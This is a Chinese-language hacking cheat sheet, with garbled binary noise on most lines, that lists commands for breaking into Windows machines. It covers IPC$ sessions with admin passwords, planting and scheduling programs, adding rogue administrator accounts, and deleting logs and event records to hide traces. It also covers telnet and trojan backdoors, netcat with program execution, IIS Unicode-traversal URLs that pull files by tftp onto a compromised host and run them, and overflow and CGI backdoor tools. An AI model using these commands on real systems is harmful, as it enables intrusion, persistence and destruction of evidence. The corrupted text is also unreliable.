网管和黑客都必须知道的命令
] :Sbvs�Pm 常用的几条NET命令:
���h
J �H �"�(Yf�vO+ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
8Q(�A�1��U �:\]���qB& (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
�u_�=^Bd�� 8~�}~�d}wW (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
}�r�Q��0*h JKF/z@Vbe\ (查看远程主机时间) net time \\IP地址
"!9�FJ �Y� U�1)!X�@F{ (定时启动某个程序) at \\IP地址 02:18 readme.exe
=&"�a�:l� ,l�l<0Atg (查看共享) net view \\IP地址
@b9qBJfQ�� 7N�My1�'-q (查看netbios工作组列表) nbtstat -A IP地址
}3�/|;0j$� 6n:�oE�XM> (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�%D49A��-R Y_FQB �K U (这两条把自己增加到管理员组): net user 用户名 密码 /add
��_oE� �7< =�lmelo#m& net localgroup Administrators 用户名 /add
:�I2�spB�x (-Q�r.t_B` (断开连接) net use \\IP地址\ipc$ /delete
"!R�*f� $� jpkK�dQ�X) 扫尾:
+6�2�}//_? )tx��2lyY: del C:\winnt\system32\logfiles\*.*
7?�I�LmYBw 0C4��Os �p del C:\winnt\ssytem32\config\*.evt
��Ab�L(F#{ �}p>l,HD�� del C:\winnt\system32\dtclog\*.*
�L�>n^Q:M� %R�Ilu��[J del C:\winnt\system32\*.log
Rxq�4Diq5k gb��u*6&j9 del C:\winnt\system32\*.txt
�q�\�/xx`L �AH�zm9U @ del C:\winnt\*.txt
�+fN2%�aC� ?!u�9=??�� del C:\winnt\*.log
G6bvV*�TRi .\�+��c�{� 一、netsvc.exe
p{x6BVw?>� >?j�me�D3u 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
lXR�B�"�z� bQ-n��<Lx netsvc /list \\IP地址
^ f[^.k$3d kbSl.V�%�) netsvc schedule \\IP地址 /query
jfYM*�%�� ��3�uL�$+F netsvc \\IP地址 schedule /start
5&�_�R+�g� "iJA�M`Hi� 二、OpenTelnet.exe
5O~;^0��iC �k)zBw(wr� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�TVV�u_i�b �j:$Z�-�s� OpenTelnet \\IP地址 用户名 密码 1 7878
C�'PHb��o:
#!>��`$�� 然后就可以telnet到主机的7878端口,进入DOS方式下:
\�[
W�`hhJ ���s
�>k4G telnet IP地址 7878
%reW/;)�l{ �~F�VbL-2� 三、winshell.exe
L�+G�����i uT
Y���G/O 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
e 8^%}�\F� �C�'t��%�e p Path (查看winshell主程序的路径信息)
4'���.]�-u ��X;v{,P=J b reBoot (重新启动机器)
= �gcZ�RoL GuF-HP}xM d shutDown (关闭机器)
iZ0.rcQj'o D=B��:��tP s Shell (执行后你就会看到可爱的“C:\>”)
&`_|�[Y ]H _zL�EHEZ�- x eXit (退出本次登录会话,此命令并不终止winshell的运行)
.UU��)����
9y*(SDF�� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�+A%zFF�3� *7qa]�i^] 四、3389登陆器,GUI方式登录远程主机的
�)O\l3h�"� +����B7UGI 五、elsave.exe
�JEf�h�r�� _�+gpdQq\p 事件日志清除工具
ZJQk�Z_9@2 �crJNT�Ez� elsave -s \\IP地址 -l "application" -C
:(�I=��z6� ��iH��Wt;] elsave -s \\IP地址 -l "system" -C
y*8;�T �v| eTt{wn�;6 elsave -s \\IP地址 -l "security" -C
nTsP�X Tat R=W$3Ue�~, 执行后成功清除应用程序日志,系统日志,安全日志
F��Wo`oJeN P�d(n|t3[8 六、hbulot.exe
0q�BXL;�sE ">�s0B�5F7 开启win2kserver和winxp的3389服务
���!�)c0� gIcPKj"8${ hbulot [/r]
ltd'"J�/r� d_98%U+��u 使用/r表示安装完成后自动重起目标使设置生效。
5�hB2:�$C ��#|lVQ@=� 七、nc.exe(netcat.exe)
'v@1�_HHW\ ;e~K<vMm;y 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
o#IWH;ck.� ��vw` '9�~ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
FFH�{#�|_1 94XRf"^�� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
)
|h�HbD^V U��z�k_ae 参数:
�]o_E]5"jO p-/}@r3Z+ -e prog 程序重定向,一旦连接,就执行 [危险!!]
2���aQ}|
` U7G�|4���( -g gateway source-routing hop point[s], up to 8
V�b2")+*�: �m�>b
i�$Y -G num source-routing pointer: 4, 8, 12, ...
9�8WJ"f_ # b��$FXRR\G -h 帮助信息
,]?l(H $x' hpt�i�cW�| -i secs 延时的间隔
y]� �~�X{v Os1��y8ui� -l 监听模式,用于入站连接
"�2@Ys*�e� CY��9`HQ1 -n 指定数字的IP地址,不能用hostname
J~G"D-l<9/ "(��?�[$�R -o file 记录16进制的传输
w��T\dzp>/ F^')�;8~�L -p port 本地端口号
�@�y�ju��i #�/p�Z#n�y -r 任意指定本地及远程端口
II_M�Y#0�X ��I�a)��^ -s addr 本地源地址
*$�>$O%�� vGPaW��YV� -u UDP模式
)5�bdW�J>l �� ,�#��-^ -v 详细输出——用两个-v可得到更详细的内容
�>�Jh�I�Rf V�a'K~$�d_ -w secs timeout的时间
�3!B��3C(g RrqZ5G�onj -z 将输入输出关掉——用于扫描时
"�i*Gi
\U� 八、TFTPD32.EXE
/h%MWCZWm^ @�)8���C�� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
c�[�0�$8F> z'�X_�s.9F http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
:ui1]it�s4 N:/$N@"G�e 然后可以直接令文件运行:
*�*O4"+Xi8 �9/|i.�2�& http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
'�C*Ny�H�c �-/�&6�}lD 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
VV�je|T^{Z }fs;y��Pl, 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
)�+9D$m=P; e�g�i?�Q�g 一、一 Xscan命令行运行参数说明:
�G8?<(.pi@ W�.��,�J�' 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
ef��P2��C\ wh�:`4�Yw� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
{1YT a:evl 7��3(T�+6` xscan -file <主机列表文件名> <检测项目> [其他选项]
Xl*-A|�:j� Q<`�`}:y|> 其中<检测项目> 含义如下:
w }�2|Do$5 ��U>x2'B v -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
x�{*!"a>� S�8�vm�XlD -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
C�1��2�7he l7J_�s�?!j -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
p�N]H��p"v )x�|��BY>� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
|:�r����/K |I+E`,n"b -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
y!!+IeReS� e?lq�s,m@" [其他选项] 含义如下:
D&9j$�#9Rh �*Ucyxpu~$ -v: 显示详细扫描进度
::T<de��7 6e��K^T=�� -p: 跳过Ping不通的主机
e#�HP+b�$� �[Iihk5TT -o: 跳过没有检测到开放端口的主机
3Yj���}ra} o>`/,�-!� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
